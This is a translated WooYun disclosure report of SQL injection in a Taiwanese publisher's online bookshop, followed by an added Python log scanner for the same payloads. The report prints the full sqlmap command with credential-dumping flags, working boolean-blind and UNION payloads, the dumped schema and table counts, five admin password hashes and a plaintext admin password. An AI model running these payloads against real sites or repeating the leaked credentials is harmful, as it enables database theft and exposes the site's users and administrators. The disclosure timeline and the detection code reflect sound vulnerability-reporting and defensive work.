Vulnerability summary

Defect ID: wooyun-2015-0155064

Title: SQL injection vulnerability on the main site of 心理出版社股份有限公司 (plaintext passwords, e-mail addresses and telephone numbers of 15,000 users exposed) (Taiwan)

Vendor: 心理出版社股份有限公司

Author: 路人甲

Submitted: 2015-11-23 18:08

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed over to a third-party partner organisation (Hitcon, the Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-11-23: details sent to the vendor; awaiting vendor action
2015-11-26: vendor confirmed; details disclosed to the vendor only
2015-12-06: details disclosed to core white hats and experts in related fields
2015-12-16: details disclosed to regular white hats
2015-12-26: details disclosed to intern white hats
2016-01-11: details disclosed to the public

Brief description:

心理出版社 was founded on 4 April 1979 by a group of scholars who shared a common educational philosophy.
Under a policy of "quality over quantity", the company's publications have maintained a steady annual output. In 1995, "知識與行動" (Knowledge and Action) by Professor 黃光國 of National Taiwan University, a National Chair Professor, won the Golden Tripod Award as a "Recommended Outstanding Book"; in 1997 the audio book "諮商實務" (Counselling Practice) won the National Institute of Educational Resources and Research award of excellence for outstanding teaching videos; in 2003 "科學理論與教育學發展" (Scientific Theory and the Development of Pedagogy) by National Chair Professor 楊深坑 of National Taiwan Normal University won the Golden Tripod Award; the following year, 2004, "誰捉弄了台灣教改?" (Who Played Tricks on Taiwan's Education Reform?) by Professor 周祝瑛 of the Department of Education, National Chengchi University, was shortlisted for the Golden Tripod Award.
The company's publishing scope covers the professional fields of psychology, guidance and counselling, psychotherapy, higher education, secondary education, early childhood education, special education, educational research and teacher education at all levels; the humanities and social sciences such as social work, sociology and gender education; and assessment and testing instruments of all kinds. It also acts as an importer of Western-language books.
心理出版社 has consistently upheld the ideals of innovation and giving back, publishing high-quality works with rigour, building a two-way bridge between scholars and readers, and providing the academic community with high-quality service.

Details:

URL: http://**.**.**.**/booklist.php?cPath=24&cate_id=64

$ python sqlmap.py -u "http://**.**.**.**/booklist.php?cPath=24&cate_id=64" -p cate_id --technique=BU --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass

Database: psyutf8
Table: customers
[12 columns]
+------------------------------+-------------+
| Column | Type |
+------------------------------+-------------+
| customers_default_address_id | int(11) |
| customers_dob | datetime |
| customers_email_address | varchar(96) |
| customers_fax | varchar(32) |
| customers_firstname | varchar(32) |
| customers_gender | char(1) |
| customers_id | int(11) |
| customers_lastname | varchar(32) |
| customers_newsletter | char(1) |
| customers_password | varchar(40) |
| customers_telephone | varchar(32) |
| epaper_temp | tinyint(1) |
+------------------------------+-------------+


Proof of vulnerability:

---
Parameter: cate_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cPath=24&cate_id=64 AND 4159=4159
Type: UNION query
Title: MySQL UNION query (56) - 32 columns
Payload: cPath=24&cate_id=64 UNION ALL SELECT 56,56,56,56,CONCAT(0x7170787171,0x646174595942726456415a73524f674a4f6e7a696a6a6f664a72634e6364696c63676b644b527747,0x716a626b71),56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user: 'psyutf8@localhost'
current user is DBA: False
database management system users [1]:
[*] 'psyutf8'@'localhost'
Database: psyutf8
+---------------------------------------------+---------+
| Table | Entries |
+---------------------------------------------+---------+
| psy_order_detail | 16919 |
| customers | 15937 |
| address_book | 15936 |
| customers_info | 11575 |
| psy_order | 8510 |
| epaper_member | 3507 |
| sessions | 3106 |
| products_to_categories | 1579 |
| products | 1574 |
| products_description | 1574 |
| products_extension_exam | 924 |
| products_extension | 792 |
| whos_online | 301 |
| products_to_agetpye | 288 |
| countries | 239 |
| configuration | 212 |
| zones | 206 |
| epaper_history | 148 |
| psy_pdt_option | 145 |
| categories | 142 |
| categories_description | 142 |
| banners_history | 76 |
| psy_news | 72 |
| admin_files | 70 |
| tbook | 32 |
| forum_smile | 31 |
| orders_total | 25 |
| configuration_group | 16 |
| psy_download | 16 |
| content | 12 |
| content_section | 11 |
| manufacturers | 11 |
| manufacturers_info | 11 |
| products_options_values | 11 |
| products_options_values_to_products_options | 11 |
| test_mail_send | 10 |
| orders_status_history | 9 |
| orders | 7 |
| orders_products | 7 |
| address_format | 6 |
| orders_products_attributes | 6 |
| products_options | 6 |
| admin | 5 |
| admin_groups | 5 |
| products_attributes | 5 |
| products_xsell | 5 |
| counter | 4 |
| psy_discount | 4 |
| psy_link | 4 |
| forum_post | 3 |
| forum_postext | 3 |
| orders_status | 3 |
| banners | 2 |
| currencies | 2 |
| forum_topic | 2 |
| products_notifications | 2 |
| administrators | 1 |
| geo_zones | 1 |
| languages | 1 |
| newsletters | 1 |
| products_attributes_download | 1 |
| tax_class | 1 |
| tax_rates | 1 |
| test | 1 |
| zones_to_geo_zones | 1 |
+---------------------------------------------+---------+
Database: information_schema
+---------------------------------------------+---------+
| Table | Entries |
+---------------------------------------------+---------+
| COLUMNS | 670 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| STATISTICS | 94 |
| TABLES | 89 |
| KEY_COLUMN_USAGE | 79 |
| TABLE_CONSTRAINTS | 69 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 4 |
| SCHEMATA | 2 |
| USER_PRIVILEGES | 1 |
+---------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: psyutf8
Table: admin
[1 column]
+----------------+-------------+
| Column | Type |
+----------------+-------------+
| admin_password | varchar(40) |
+----------------+-------------+
Database: psyutf8
Table: administrators
[1 column]
+------------+-------------+
| Column | Type |
+------------+-------------+
| admin_pass | varchar(40) |
+------------+-------------+
Database: psyutf8
Table: customers
[1 column]
+--------------------+-------------+
| Column | Type |
+--------------------+-------------+
| customers_password | varchar(40) |
+--------------------+-------------+
Database: psyutf8
Table: admin
[5 entries]
+-------------------------------------+
| admin_password |
+-------------------------------------+
| 1247cfaba6684daf0a564edd5e7dc570:5e |
| 4f5f468d3f46006bb0c1b38a74367c47:d3 |
| 66f383de321e21fecade5bacf05ff2a1:f9 |
| 71f014f1a8511f4b5a00f41760c002a4:b2 |
| c98b8dcbb116c0ef35aa36c697a8affb:02 |
+-------------------------------------+
Database: psyutf8
Table: administrators
[1 entry]
+------------+
| admin_pass |
+------------+
| admin |
+------------+
Database: psyutf8
Table: customers
[15909 entries]

Fix recommendation:

Put a WAF in front of it.
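Added example, not part of the original report: a log-side check in Python that flags requests to booklist.php whose integer-only parameters (cPath and cate_id, as used in the report's URL) carry anything other than digits, and that also matches the two payload shapes sqlmap reported against cate_id above, the "AND n=n" tautology and the UNION ALL SELECT with hex literals. The log lines are constructed for this example (documentation IP ranges), and the strict integer check on the parameter is the same rule a fixed booklist.php should enforce server-side before the value reaches a query.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# booklist.php parameters that the application only ever uses as integers
# (cPath and cate_id, per the report); anything else in them is suspect.
INT_PARAMS = {"cPath", "cate_id"}

# Shapes of the two payloads sqlmap reported against cate_id: an "AND n=n"
# tautology (boolean-based blind) and a UNION query carrying hex literals.
TAUTOLOGY = re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.IGNORECASE)
UNION_SELECT = re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.IGNORECASE)
HEX_LITERAL = re.compile(r"\b0x[0-9a-f]{6,}\b", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed Apache-style log lines (documentation IP ranges). Lines 2 and 3
# carry the report's two payloads, URL-encoded as a client would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Nov/2015:18:01:02 +0800] "GET /booklist.php?cPath=24&cate_id=64 HTTP/1.1" 200 8123
203.0.113.5 - - [23/Nov/2015:18:01:03 +0800] "GET /booklist.php?cPath=24&cate_id=64%20AND%204159%3D4159 HTTP/1.1" 200 8123
203.0.113.5 - - [23/Nov/2015:18:01:04 +0800] "GET /booklist.php?cPath=24&cate_id=64%20UNION%20ALL%20SELECT%2056,CONCAT(0x7170787171,0x6461745959,0x716a626b71)%23 HTTP/1.1" 200 9001
198.51.100.7 - - [23/Nov/2015:18:02:00 +0800] "GET /booklist.php?cPath=24&cate_id=abc HTTP/1.1" 200 100
"""


def inspect_request(path):
    """Return the findings for one request path; an empty list means it looks clean."""
    findings = []
    # parse_qsl percent-decodes the values, so the regexes see the real SQL text
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        if name in INT_PARAMS and not value.isdigit():
            findings.append(f"{name}: non-integer value {value!r}")
        if TAUTOLOGY.search(value):
            findings.append(f"{name}: boolean tautology")
        if UNION_SELECT.search(value):
            findings.append(f"{name}: UNION SELECT")
        if HEX_LITERAL.search(value):
            findings.append(f"{name}: hex literal")
    return findings


def scan_log(text):
    """Map the 1-based number of each suspicious log line to its findings."""
    report = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if match:
            findings = inspect_request(match.group(1))
            if findings:
                report[lineno] = findings
    return report
```

Running scan_log(SAMPLE_LOG) leaves the legitimate first request alone and reports lines 2 to 4; the non-integer rule alone catches all three, which is why input typing, not just signature matching, is the durable fix.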

Copyright notice: when reposting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-11-26 14:27

Vendor reply:

Thank you for the report

Latest status:

2015-12-21: Fixed